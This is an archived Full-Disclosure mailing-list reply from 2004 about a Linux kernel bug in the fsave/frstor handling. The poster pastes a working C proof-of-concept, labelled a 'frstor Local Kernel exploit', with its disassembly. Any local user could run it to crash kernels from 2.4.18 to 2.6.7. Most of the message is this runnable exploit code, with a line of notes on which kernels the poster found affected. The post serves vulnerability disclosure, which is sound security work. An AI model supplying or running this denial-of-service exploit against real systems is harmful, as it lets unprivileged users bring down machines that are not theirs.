[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] linux kernel local crash seen on slashdot

To: Skip Duckwall <skip@xxxxxxxxxxxx>
Subject: Re: [Full-Disclosure] linux kernel local crash seen on slashdot
From: Lorenzo Hernandez Garcia-Hierro <lorenzohgh@xxxxxxxxxxxxx>
Date: Mon, 14 Jun 2004 19:13:10 +0200

Hi,

> Looked through the archives here and didn't see this one yet..
> 
> http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html

There is also an article in Slashdot ( i've been out of the list and
possibly others sent the link , anyway i'm pasting it here ):

http://slashdot.org/articles/04/06/14/118209.shtml?tid=106&tid=126&tid=128&tid=185&tid=190

There is proof of concept code at some of the slashdot comments,this is
a modified version with more information ( and a little change of fsave
line.):

===

/* --------------------
 * frstor Local Kernel exploit
 * Crashes any kernel from 2.4.18
 * to 2.6.7 because frstor in assembler inline offsets in memory by 4.
 * Original proof of concept code
 * by stian_@xxxxxxxxxx
 * Added some stuff by lorenzo_@xxxxxxxx
 * and fixed the fsave line with (*fpubuf).
 * --------------------
 */

/*
---------
Some debugging information made
available by stian_@xxxxxxxxx
---------
TakeDown:
        pushl   %ebp
        movl    %esp, %ebp
        subl    $136, %esp
        leal    -120(%ebp), %eax
        movl    %eax, -124(%ebp)
#APP
        fsave -124(%ebp)

#NO_APP
        subl    $4, %esp
        pushl   $1
        pushl   $.LC0
        pushl   $2
        call    write
        addl    $16, %esp
        leal    -120(%ebp), %eax
        movl    %eax, -128(%ebp)
#APP
        frstor -128(%ebp)

#NO_APP
        leave
        ret
*/

#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

static void TakeDown(int ignore)
{
 char fpubuf[108];
// __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
__asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf)); 
 write(2, "*", 1);
 __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
 struct itimerval spec;
 signal(SIGALRM, TakeDown);
 spec.it_interval.tv_sec=0;
 spec.it_interval.tv_usec=100;
 spec.it_value.tv_sec=0;
 spec.it_value.tv_usec=100;
 setitimer(ITIMER_REAL, &spec, NULL);
 while(1)
  write(1, ".", 1);

 return 0;
}
// <<EOF

===

Cheers,
PS: My 2.4.25-gentoo seems not affected by this but the bf24 flavour of
my old box is vulnerable.
-- 
Lorenzo Hernandez Garcia-Hierro <lorenzohgh@xxxxxxxxxxxxx>

Attachment: signature.asc
Description: Esta parte del mensaje =?iso-8859-1?q?est=E1?= firmada digitalmente

References:
- Re: [Full-Disclosure] Multiple Antivirus Scanners DoS attack. [summery]
  - From: bipin gautam
- [Full-Disclosure] linux kernel local crash seen on slashdot
  - From: Skip Duckwall

Prev by Date: Re: [Full-Disclosure] FOUND: COELACANTH: Phreak Phishing Expedition
Next by Date: [Full-Disclosure] authentication bug in KAME's racoon
Previous by thread: [Full-Disclosure] linux kernel local crash seen on slashdot
Next by thread: Re: [Full-Disclosure] linux kernel local crash seen on slashdot
Index(es):
- Date
- Thread